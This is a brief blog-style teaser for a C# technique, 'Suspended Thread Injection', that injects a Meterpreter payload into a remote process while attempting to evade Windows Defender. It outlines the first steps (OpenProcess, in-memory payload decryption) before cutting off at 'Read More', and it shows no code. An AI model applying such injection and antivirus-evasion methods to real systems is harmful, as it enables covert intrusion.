Tuesday, October 19, 2021

Suspended Thread Injection: Another Meterpreter injection technique using C# that attempts to bypass Defender

Suspended Thread Injection

Another meterpreter injection technique using C# that attempts to bypass Defender.

Introduction

This code was written after reading Bypassing Windows Defender Runtime Scanning by F-Secure Labs. The technique I have written isn’t the same but it got me thinking about how I can inject meterpreter into a remote process and go under the Defender radar.

The technique is quite simple:

Open a remote process using OpenProcess .

. Decrypt the meterpreter payload in memory…

Read More

Latest news
Related news